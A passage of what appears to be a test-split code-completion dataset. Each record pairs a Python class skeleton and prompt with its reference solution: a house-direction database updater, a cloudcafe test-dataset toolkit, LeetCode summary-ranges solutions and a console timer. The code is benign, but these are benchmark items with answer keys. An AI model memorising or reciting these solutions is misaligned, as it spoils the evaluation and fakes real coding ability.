direction_source: 朝向来源 :param room_num: 房号", "prompted_full_text": "Implement the Python class `Direction` described below.\n\nClass description:\nImplement the Direction class.\n\nMethod signatures and docstrings:\n- def format_direction(cls, direction): :param direction: 朝向 :return: 有效朝向\n- def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None): :param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\n\n<|skeleton|>\nclass Direction:\n\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n <|body_0|>\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n<|end_body_0|>\n\n<|body_start_1|>\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n<|end_body_1|>\n", "revision_id": "808cb78fc3887f35bf838d77d62308fce9e6aa5d", "skeleton": "<|skeleton|>\nclass Direction:\n\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n <|body_0|>\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Direction:\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 
'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n", "source": "the_stack_v2_python_sparse", "source_path": "hilder_pretreatment/raise_coverage/house_raise/direction_update.py", "source_repo": "pjkui/githubproject", "split": "test", "star_events_count": 0} {"blob_id": "a5fdf182d391ef1b00713fabb23dc8abbc048892", "bodies": ["resp = get_model_list_method(*get_method_args, **get_method_kwargs)\nif not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\nif resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\nreturn resp.entity", "if not model_filter:\n return model_list\nif filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\nfinal_list = []\nfor model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\nreturn final_list", "if randomize:\n shuffle(dataset_list)\nif max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\nreturn dataset_list"], "bodies_text": "<|body_start_0|>\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n<|end_body_0|>\n\n<|body_start_1|>\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. 
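The Direction record above never shows cls._true_words, so format_direction cannot run as extracted. The standalone sketch below substitutes a hypothetical whitelist so the compass-character scan can be exercised; the set's contents are an assumption, not part of the record.

# Hypothetical whitelist standing in for the class's undefined _true_words.
TRUE_WORDS = {'东', '南', '西', '北', '南北', '东西', '东南', '东北', '西南', '西北'}

def format_direction(direction):
    # Collect compass characters in scan order (east, south, west, north),
    # regardless of where they appear in the input string.
    word_list = [k for k in ['东', '南', '西', '北'] if k in str(direction)]
    joined = ''.join(word_list)
    if word_list and joined in TRUE_WORDS:
        return joined
    return None  # unrecognised direction

print(format_direction('坐北朝南'))  # '南北' (scan order, not input order)
print(format_direction('不详'))      # None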
_filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n<|end_body_1|>\n\n<|body_start_2|>\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n<|end_body_2|>\n", "class_docstring": "Collection of dataset generators and helper methods for developing data driven tests", "class_name": "ModelBasedDatasetToolkit", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n <|body_0|>\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n <|body_1|>\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n<|end_body_0|>\n\n<|body_start_1|>\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. 
_filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n<|end_body_1|>\n\n<|body_start_2|>\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000017", "length_bytes": 3872, "license_type": "permissive", "methods": [{"docstring": "Gets list of all models in the environment.", "name": "_get_model_list", "signature": "def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs)"}, {"docstring": "Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.", "name": "_filter_model_list", "signature": "def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None)"}, {"docstring": "Aggregates common modifiers for dataset lists", "name": "_modify_dataset_list", "signature": "def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False)"}], "n_methods": 3, "prompt": "Implement the Python class `ModelBasedDatasetToolkit` described below.\n\nClass description:\nCollection of dataset generators and helper methods for developing data driven tests\n\nMethod signatures and docstrings:\n- def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs): Gets list of all models in the environment.\n- def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None): Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. 
exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\n- def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False): Aggregates common modifiers for dataset lists", "prompted_full_text": "Implement the Python class `ModelBasedDatasetToolkit` described below.\n\nClass description:\nCollection of dataset generators and helper methods for developing data driven tests\n\nMethod signatures and docstrings:\n- def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs): Gets list of all models in the environment.\n- def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None): Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\n- def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False): Aggregates common modifiers for dataset lists\n\n<|skeleton|>\nclass ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n <|body_0|>\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n <|body_1|>\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n<|end_body_0|>\n\n<|body_start_1|>\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. 
_filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n<|end_body_1|>\n\n<|body_start_2|>\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n<|end_body_2|>\n", "revision_id": "7d49cf6bfd7e1a6e5b739e7de52f2e18e5ccf924", "skeleton": "<|skeleton|>\nclass ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n <|body_0|>\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n <|body_1|>\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. 
exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n", "source": "the_stack_v2_python_sparse", "source_path": "cloudcafe/common/datasets.py", "source_repo": "kurhula/cloudcafe", "split": "test", "star_events_count": 0} {"blob_id": "f0cd623056a2bb137ff21dcf8f159717f0f1d627", "bodies": ["ans = []\nstart = 0\nfor p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\nreturn ans", "start = 0\nans = []\nnums.append(float('INF'))\nfor i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\nreturn ans"], "bodies_text": "<|body_start_0|>\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = 
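In the ModelBasedDatasetToolkit record above, the inclusion branch of _filter_model_list reduces to "keep a model if any listed attribute value matches". A dependency-free restatement of that branch (FakeModel and the sample filter are invented for illustration):

class FakeModel:
    def __init__(self, id, name):
        self.id, self.name = id, name

models = [FakeModel('12345', 'a'), FakeModel('42', 'b'), FakeModel('7', 'c')]
model_filter = {'id': ['12345', '42']}  # attribute name -> accepted values

# Inclusion mode: a model survives if any filter key matches one of its values;
# values are compared as strings, mirroring str(getattr(model, k)) in the record.
included = [m for m in models
            if any(str(getattr(m, k)) in values
                   for k, values in model_filter.items())]
print([m.name for m in included])  # ['a', 'b']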
i\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000018", "length_bytes": 1366, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges_group", "signature": "def summaryRanges_group(self, nums)"}, {"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges_onepass", "signature": "def summaryRanges_onepass(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges_group(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_onepass(self, nums): :type nums: List[int] :rtype: List[str]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges_group(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_onepass(self, nums): :type nums: List[int] :rtype: List[str]\n\n<|skeleton|>\nclass Solution:\n\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n<|end_body_1|>\n", "revision_id": "0e99f9a5226507706b3ee66fd04bae813755ef40", "skeleton": "<|skeleton|>\nclass Solution:\n\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/arrayandstring/test_228_Summary_Ranges.py", "source_repo": "wuxu1019/leetcode_sophia", "split": "test", "star_events_count": 1} {"blob_id": "ea0a5546d075ac8df98d2a3cf61382bf514b33df", "bodies": ["try:\n prepend = COLOR_CODES[color] if color else ''\n append = 
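The summaryRanges_group body just above rests on a classic trick: in a sorted list of integers, index minus value is constant across a run of consecutive values, so itertools.groupby on that key splits the list into runs. A slight variant that carries the values through the groups directly:

import itertools

nums = [0, 1, 2, 4, 5, 7]
ans = []
# Key: index - value stays constant within each consecutive run.
for _, group in itertools.groupby(enumerate(nums), key=lambda p: p[0] - p[1]):
    run = [v for _, v in group]
    ans.append(str(run[0]) if len(run) == 1 else '{}->{}'.format(run[0], run[-1]))
print(ans)  # ['0->2', '4->5', '7']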
COLOR_CODES['reset'] if color else ''\nexcept KeyError:\n prepend = ''\n append = ''\nself.txt = prepend + txt + append\nself.newline = newline", "self.start = time()\nif not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\nelse:\n print(self.txt + '... ')", "if self.newline:\n print(self.txt + ' done in ', end='')\nprint('{:.2f} sec.'.format(time() - self.start))"], "bodies_text": "<|body_start_0|>\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n<|end_body_0|>\n\n<|body_start_1|>\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n<|end_body_2|>\n", "class_docstring": "Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something", "class_name": "Timer", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n <|body_0|>\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n <|body_1|>\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n<|end_body_0|>\n\n<|body_start_1|>\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000019", "length_bytes": 1784, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.", "name": "__init__", "signature": "def __init__(self, txt: str, newline: bool=False, color: str=None)"}, {"docstring": "Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.", "name": "__enter__", "signature": "def __enter__(self)"}, {"docstring": "Used at the end of the section inside \"With Timer()\". 
Prints 'done' and the final time.", "name": "__exit__", "signature": "def __exit__(self, type, value, tb)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000464", "prompt": "Implement the Python class `Timer` described below.\n\nClass description:\nExample of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\n\nMethod signatures and docstrings:\n- def __init__(self, txt: str, newline: bool=False, color: str=None): Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\n- def __enter__(self): Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\n- def __exit__(self, type, value, tb): Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.", "prompted_full_text": "Implement the Python class `Timer` described below.\n\nClass description:\nExample of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\n\nMethod signatures and docstrings:\n- def __init__(self, txt: str, newline: bool=False, color: str=None): Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\n- def __enter__(self): Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\n- def __exit__(self, type, value, tb): Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\n\n<|skeleton|>\nclass Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n <|body_0|>\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n <|body_1|>\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n<|end_body_0|>\n\n<|body_start_1|>\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n<|end_body_2|>\n", "revision_id": 